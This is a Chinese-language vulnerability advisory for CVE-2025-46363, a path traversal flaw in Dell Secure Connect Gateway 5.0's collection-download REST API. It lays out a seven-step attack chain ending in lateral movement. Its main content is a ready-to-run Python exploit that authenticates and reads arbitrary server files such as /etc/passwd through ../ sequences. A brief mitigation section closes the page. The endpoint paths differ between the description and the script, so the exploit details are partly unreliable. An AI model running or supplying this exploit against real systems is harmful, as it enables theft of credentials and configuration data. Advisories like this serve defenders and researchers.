CVE-2025-46363 Dell SCG 相对路径遍历漏洞

漏洞信息

漏洞编号

CVE-2025-46363

漏洞类型

路径遍历

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Dell Secure Connect Gateway (SCG) 5.0 Application and Appliance

漏洞概述

CVE-2025-46363是Dell Secure Connect Gateway (SCG) 5.0版本中发现的一个相对路径遍历（Relative Path Traversal）安全漏洞。该漏洞存在于SCG系统暴露的内部集合下载REST API中，当管理员用户在UI中启用该REST API后，低权限攻击者可通过远程访问利用此漏洞。攻击者利用路径遍历技术（如使用../等相对路径字符）绕过正常访问控制，访问服务器上受限的系统资源和文件。此漏洞的CVSS评分为4.3，属于中等严重程度，主要影响系统的机密性，可能导致敏感配置文件、系统日志、用户凭证等受限资源的泄露。Dell已发布安全更新以修复此漏洞，建议受影响的用户尽快升级到最新版本。

技术细节

该漏洞属于典型的相对路径遍历（Path Traversal）漏洞，存在于Dell SCG的REST API接口中。漏洞产生的根本原因是应用程序在处理用户请求的文件路径时，未对用户输入进行充分的验证和过滤，允许攻击者通过构造包含相对路径字符（如../或..\）的特殊请求来逃离预期的目录范围。在SCG的内部集合下载REST API中，攻击者可以修改API请求参数，将路径遍历序列注入到文件路径中，从而访问Web根目录之外的系统文件。例如，攻击者可能通过构造类似/api/collection/download?file=../../../etc/passwd的请求来读取系统敏感文件。此漏洞的利用前提是目标REST API已被管理员启用，且攻击者需要拥有有效的低权限账号。由于该API设计为内部使用，其访问控制机制可能不够严格，为攻击者提供了可乘之机。成功利用此漏洞可导致敏感数据泄露，进而为后续更复杂的攻击（如横向移动或权限提升）奠定基础。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者扫描互联网或内部网络中的Dell SCG实例，识别运行5.26.00.00-5.30.00.00版本的目标系统

STEP 2

步骤2

获取访问权限：攻击者获取或创建有效的低权限用户账号，用于登录Dell SCG系统

STEP 3

步骤3

确认API状态：验证目标系统上REST API是否已被管理员启用（可通过UI配置或API探测确认）

STEP 4

步骤4

构造恶意请求：攻击者构造包含路径遍历序列（如../或..\）的特殊API请求，目标是内部集合下载REST API端点

STEP 5

步骤5

触发漏洞：发送恶意构造的HTTP GET请求到/api/v1/collection/download端点，参数中包含相对路径遍历payload

STEP 6

步骤6

获取敏感文件：成功利用后，攻击者能够读取Web应用目录之外的受限系统文件，如/etc/passwd、配置文件、密钥文件等

STEP 7

步骤7

横向移动：利用获取的敏感信息（如数据库凭证、API密钥），进一步扩大攻击范围，获取更高权限或访问其他系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-46363 PoC - Dell SCG Path Traversal
# Target: Dell Secure Connect Gateway REST API
# Vulnerability: Relative Path Traversal in collection download API

def exploit_path_traversal(target_url, username, password, target_file):
    """
    Exploit path traversal vulnerability in Dell SCG REST API
    
    Args:
        target_url: Base URL of Dell SCG instance
        username: Valid low-privilege user credentials
        password: User password
        target_file: File to read (e.g., ../../../etc/passwd)
    
    Returns:
        File contents if successful, None otherwise
    """
    # Authentication
    login_url = f"{target_url}/api/v1/auth/login"
    login_data = {
        "username": username,
        "password": password
    }
    
    try:
        # Login to get session token
        session = requests.Session()
        login_response = session.post(login_url, json=login_data, verify=False, timeout=30)
        
        if login_response.status_code != 200:
            print(f"[-] Authentication failed: {login_response.status_code}")
            return None
        
        token = login_response.json().get('token')
        headers = {'Authorization': f'Bearer {token}'}
        
        # Exploit path traversal
        exploit_url = f"{target_url}/api/v1/collection/download"
        params = {'file': target_file}
        
        print(f"[*] Exploiting path traversal: {target_file}")
        response = session.get(exploit_url, headers=headers, params=params, verify=False, timeout=30)
        
        if response.status_code == 200:
            print(f"[+] Successfully read file: {target_file}")
            print(f"[+] Content length: {len(response.content)} bytes")
            return response.text
        else:
            print(f"[-] Exploitation failed: HTTP {response.status_code}")
            return None
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request error: {str(e)}")
        return None

if __name__ == "__main__":
    if len(sys.argv) < 5:
        print("Usage: python cve_2025_46363_poc.py <target_url> <username> <password> <file_path>")
        print("Example: python cve_2025_46363_poc.py https://scg.dell.com admin password ../../../etc/passwd")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    file_path = sys.argv[4]
    
    result = exploit_path_traversal(target, user, pwd, file_path)
    if result:
        print("\n[+] File contents:")
        print(result[:1000])  # Print first 1000 chars

影响范围

Dell SCG 5.0 Application and Appliance 5.26.00.00

Dell SCG 5.0 Application and Appliance 5.27.00.00

Dell SCG 5.0 Application and Appliance 5.28.00.00

Dell SCG 5.0 Application and Appliance 5.29.00.00

Dell SCG 5.0 Application and Appliance 5.30.00.00

防御指南

临时缓解措施

如果暂时无法立即升级，可采取以下临时缓解措施：1）通过Dell SCG管理UI禁用内部集合下载REST API功能；2）在上游网络设备（如防火墙、负载均衡器）上配置规则，限制对/api/v1/collection/download端点的访问，仅允许受信任的管理IP访问；3）监控和阻止包含路径遍历字符的HTTP请求；4）审查并限制低权限用户的系统访问范围；5）启用安全审计日志，密切监控异常的API访问行为。建议在条件允许时尽快应用Dell官方发布的安全更新。